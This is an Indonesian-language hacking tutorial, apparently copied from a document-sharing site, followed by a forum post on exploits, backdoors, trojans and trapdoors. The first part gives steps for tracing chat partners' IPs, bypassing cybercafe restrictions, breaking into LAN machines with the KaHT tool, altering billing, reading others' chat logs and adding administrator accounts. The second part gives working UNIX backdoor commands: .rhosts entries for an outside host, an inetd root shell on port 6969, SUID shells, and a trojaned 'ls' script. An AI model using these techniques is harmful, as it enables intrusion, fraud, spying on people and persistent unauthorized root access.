Anda di halaman 1dari 10

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang

Artikel ini ditulis karena terinspirasi pertanyaan om Rasters tentang bagaimana cara
melacak IP address suatu situs. Dalam artikel ini Spyro akan membahas hal-hal berikut:

1. Melacak alamat IP suatu situs

2. Melacak Real Adress server suatu situs

3. Cara Mengetahui IP address lawan chatting kita

(:::::—– Pembahasan —–::::

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat
melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan
PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs
tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu
situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka
www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat
situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut
diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger,
sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan
suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan
ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah
anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. ::
Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus
atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan
mempergunakan alamat IP yang anda dapatkan.

*Ingin menggunakan YM untuk beberapa user id di komputer yang sama? Anda bisa
menggunakan software dan juga bisa dengan trik di bawah ini:

1. Start > Run…> regedit

2. Buka HKEY_CURRENT_USER > Software > yahoo > pager > test

3. Pada sebelah kanan, klik kanan > New > DWORD value

4. Beri nama Plural tekan enter 2 kali dan berikan nilai 1

5. Pastikan YM anda telah dimatikan, jalankan YM dan login secara biasa.

6. Kalau masih tidak bisa coba lagi step ke-5, kalau masih tidak bisa RESTART Tutorial
Hacker Part 2 :
Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak
tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya,
memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois
aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja
yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar
anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas
teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan
menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda,
misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini
( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si
pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file
ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa
penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya,
sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar
di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang
membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting
dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita
bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP
yang serba di lock fasilitasnya :

1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties

2. Di properties pilihlah "find target…"

3. Muncul Window lalu pilih search diatas

4. Pada Search pilihlah "All Files and folders"

5. Lalu cari file "cmd.exe" di windows

6. Jika di temukan maka jalankan file cmd.exe.

7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata
penguncian benar-benar total maka anda dapat mengubah registry windows melalui
pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg
tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita
dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi
sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-
DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga
terlalu BT, kita tembus aja pakek cara ini

1. Masuk ke Notepad / Wordpad / Ms Word

2.Laluketik dibawah ini REGEDIT4


[HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""S
ystem] "DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""E
xplorer] "NoRun"=dword:00000000

3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat
tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan
komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya
melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita
gunakan.

4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk
dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda,
membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya
ada disini.

1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac
(Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas
client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker
KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat
hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus /
kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu
jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2
program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan
sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka
ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di
extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname
dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih
computers or people lalu pilih A computer on the Network lalu langsung klik search maka
akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows
95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk
ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah
computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka
nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network
Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di
masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke
Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan
mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui
sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program
Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect
sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau
terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS
Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan
DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP
: Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows
95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah
berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi
program diextract dimana, hehe, (Misal tadi di extract di C:\""KaH) maka ketikkan
"CD\""KaHT" dan seterusnya. Jika sudah, ini saatnya? Ketikkan "KaHT
sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini :
"KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya
192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT
192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan
otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di
"c:\""windows\""system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda
bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah
begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di
billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus
nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting
pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan
dalam computer tersebut, biasanya seh di C:\""Program Files\""MiRC, buka file MiRC.INI,
lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat
"/logs" maksudnya kalau tadi di C:\""program Files\""MiRC program MiRCnya maka cukup
masuk aja di C:\""Program Files\""MiRC\""Logs nanti disitu ada file-file log hasil chattingan
dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick
apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja
file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh
lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering
menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada
terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..
5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin
membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah,
caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas,
lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows
Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat
akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators
Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net
localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download
Proactive Windows Security Explorer

 Re: Cara untuk melihat IP address


Post by skydcloud on Apr 29, 2007, 7:15pm

Artikel ini ditujukan untuk memandu mereka yang masih bingung dengan terminologi sekuritas
jaringan komputer seperti exploit,
trojan, dll dan ingin mengetahui konsep-konsep dasarnya.

EXPLOITS
Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru
yang baru kamu 'dapatkan'.
Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?".
Dalam konteks per-hacking-an,
eksploit tidaklah jauh berbeda dengan artinya dalam konteks harfiah, yaitu 'pemanfaatan'.
Tentunya eksploit-eksploit 'hacking' lebih
spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah sistem
untuk tujuan-tujuan yang diluar
dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan pemrograman, sesuatu
yang tidak direncanakan oleh
pemrogram asli, dan lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit
yang akan memberikan kita akses
tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah
'mengeksploit program anu untuk mendapat
privilese root'. Tentu saja mendapatkan 'root' bukanlah satu-satunya tujuan pengeksploitan sistem.
Seperti yang mungkin anda sudah
alami sendiri, kadang sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk
tujuan 'header forging',
'ip spoofing', 'denial of service attack', dan 'mail bombing'.

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote. Eksploit
lokal adalah jenis eksploit yang
hanya bisa dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu melalui login
telnet, ftp, dll). Eksploit jenis ini
jumlahnya banyak, sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-
eksploit. Contoh - contoh dari
eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions
(dimana dua proses saling berlomba
untuk menyelesaikan tugas masing-masing, biasanya proses A disuruh untuk menjalankan suatu
utilitas yang membutuhkan privilese
root temporer sementara proses B dirancang untuk mencegat proses A sebelum proses A kembali
statusnya ke privilese user biasa,
mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan
SunOS.) Bagaimana caranya agar saya
bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu berjam-jam
untuk mengutak-utik sebuah program
sampai berhasil kamu jebol (lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya.
Biasanya eksploit diprogram
dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya
malas), banyak eksploit yang sudah didokumentasi.

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa
mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit
jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah
salah satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu
LithErr pernah memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun
sekalinya sang 'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari
salah seorang user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses
tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan
akses root tanpa password. Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-
eksploit remote? Jelas sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja
yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak
(roachscan) yang saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus,
mencari file password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum. Satu
program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat
dari http://www.l0pht.com/. Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi,
jalankan skrip, tinggal berikan daftar target-target dan tinggalkan untuk sementara waktu. Kembali
lagi sejam atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada lobangnya,
bisa dieksploit atau tidak, dll (coba lihat artikel-artikel mengenai scanning/probing di situs-situs
hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang
walaupun kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campur tangan
dari user lokal untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan
mengirimkan file password ke alamat email tertentu.)
BACKDOOR
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor
berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user
lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'.
Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan
masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang
sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan
sejenisnya,
dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam
sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada
penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke
sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal
untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja
di
keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih
jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan
jika kamu mempunyai perizinan root. Ingat, bahwa tujuan membuat backdoor bukanlah untuk
mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin
menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file
/etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak.
Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin,
sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan
privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-
router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor
kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah
dengan melalui file /.rhosts:

korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar -dalam contoh diatas user
ganjaman dari indohack2.ri.go.id - yang boleh mengakses account tanpa password), dan untuk
masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

poof! shell root tanpa password!


Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari
file /etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.
Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak
diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet
dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd
biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa
sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts
di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun
kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan
shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masala
h ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang s
ysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah
skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri
dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan
merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah
rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon -
tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat
sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":

root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services
root@korban
# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban#
echo
"echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat,
namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak
begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic
Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan
biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang


sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell
berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak
bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap
dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di
direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu
mencurigakan seperti /tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita
luncurkan(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun
untukmenghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu
menambahkan entri dari mesin host kita ke file .rhosts milik root. Tentu jika sang admin memang
keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika
kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin
tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat
belakang ke dalam sistem target (idih, kesannya kayak cerita-cerita porno anal seks aja!).
Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di
mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r
dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts
milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap system
target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip
'asing' dijalankan lewat port 6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

dan, BOOM!
korban#

shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke
indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu
ngent...engin badannya ..." ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak
lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan anti
deteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll.
Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi,
seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti
utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan,
namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan
yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp
atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program
yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option
rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel kelas kacangan ini),
kamu bisa modifikasi daemon-daemon yang sedang berjalan untuk menerima perintah-perintah
hasil karangan kamu sendiri. Berikut adalah cuplikan dari metode milik Hacker FBI telah berhasil
memodifikasi program
sendmail di server korban.com (tembakan pestol efbiay!):

212@GG> telnet korban.com


25 Trying mesin.korban.com
Connected to mesin.korban.com
Escape character is '^]'.
220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5
[snip]
PSM_EXEC /bin/cp /bin/sh /tmp/elit
Done ... master! PSM_EXEC /bin/chmod 4755 /tmp/elit
Done ... master!
Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan segala kerendahan
hati
minta izin untuk berguru!

TROJAN HORSE
Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya
efektif jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang
betul-betul tolol. Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap.
Misalnya kamu membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan
perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa sehingga saat sang
sysadmin menjalankan program tersebut, tanpa disadarinya file .rhosts nya telah ketambahan
sesuatu. Kami kenal seorang hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan
mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip tersebut tanpa menyadari
bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan akses tak berpassword
kepada sang penulis asli skrip.
TRAPDOOR
Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini,
'Trapdoor' diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin
untuk memberikan kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi
yang paling gres, atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak
berjalan sama sekali (patched systems). Jangan putus asa! Masih banyak metode yang bisa kita
terapkan untuk membuat sang sysadmin tertipu, berakibat dibukanya akses ke dalam system.
Misalkan kamu sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan
password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak ada exploit yang
mempan. Nah, sudah saatnya kita terapkan metode Trapdoor. Berikut adalah metode Trapdoor
yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang
accountnya kamu 'pinjam'):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke
root jika beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah
skrip yang bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan
sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir
olehmu, jelas, perintah ls. Disinilah letak kelemahan UNIX dibanding ... uh, MS-DOS. Dalam UNIX,
seorang sysadmin yang baik selalu mengetik 'full pathname' dari program manapun yang dia
jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin
atau /usr/sbin sudah dimasukkan dalam daftar search path. Jadi jika misalnya sang sysadmin
melakukan:

root# pwd
/usr/home/staff/user1
root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori
/usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh ... cukup menarik, khan.
Nah, sekarang kita bisa buat sebuah skrip yang berisi:

#!/bin/sh cp /bin/sh /tmp/vi-save-902887


chown root /tmp/vi-save-902887
chmod 4755 /tmp/vi-save-902887
rm ./ls
ls
simpan skrip tersebut di homedir user1, beri nama "ls" dan
user1@korban> chmod +x ls
sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir
user1. Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa
saja 'mengundang' sang admin. Login sebagai user1, dan kirim email

user1@korban> mail root@localhost


Subject: "Heheheh ... Kena garap dari belakang!"
Hello sysadmin tolol! Mesin kamu sudah kebobolan!
ttd, God of All Hackers, Virus Researchers and Lame Mailbombers,
Phardera .

Saat menerima email ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan
perintah ls, tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di
/tmp/vi-save-902887. Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan
bermacam-macam hal menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu
kemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh ...

Anda mungkin juga menyukai